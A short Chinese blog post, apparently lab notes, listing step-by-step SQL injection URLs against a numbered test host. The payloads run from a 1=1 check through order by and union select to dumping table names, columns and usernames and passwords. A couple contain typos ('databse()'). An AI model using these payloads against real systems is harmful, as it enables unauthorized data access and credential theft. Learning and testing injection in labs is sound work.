常规sql注入

Csdn奥利奥

已于 2023-03-29 10:27:40 修改

阅读量195

点赞数

分类专栏：渗透文章标签： sql 数据库 mysql

于 2023-03-29 10:18:00 首次发布

本文链接：https://blog.csdn.net/qq_42036164/article/details/129831432

版权

渗透专栏收录该内容

15 篇文章 0 订阅

订阅专栏

文章提供了一系列URL示例，用于测试SQL注入漏洞，包括检查注入存在的基础测试，如1=1，通过orderby字段测试回显，利用unionselect来爆库和数据表，以及获取特定表的字段值。这些方法揭示了Web应用程序可能存在的安全问题。

摘要由CSDN通过智能技术生成

常规SQL注入
测试是否存在SQL注入http://123.1.1.1:1111/less/?id=1’ and 1=1 ;%00
测试字段http://123.1.1.1:1111/less/?id=1’ order by 3 ;%00
测试回显字段http://123.1.1.1:1111/less/?id=1’ union select 1,2,3 ;%00
爆数据库http://123.1.1.1:1111/less/?id=1’ union select 1,database(),3 ;%00
爆数据表http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(table_name),3from information_schema.tables where table_schema=databse() ;%00
爆数据表字段http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(column_name),3from information_schema.columns where table_name=“123” ;%00
获取字段值http://123.1.1.1:1111/less/?id=1’ union select 1,group_concat(id,username,password),3 from user ;%00
在这里插入图片描述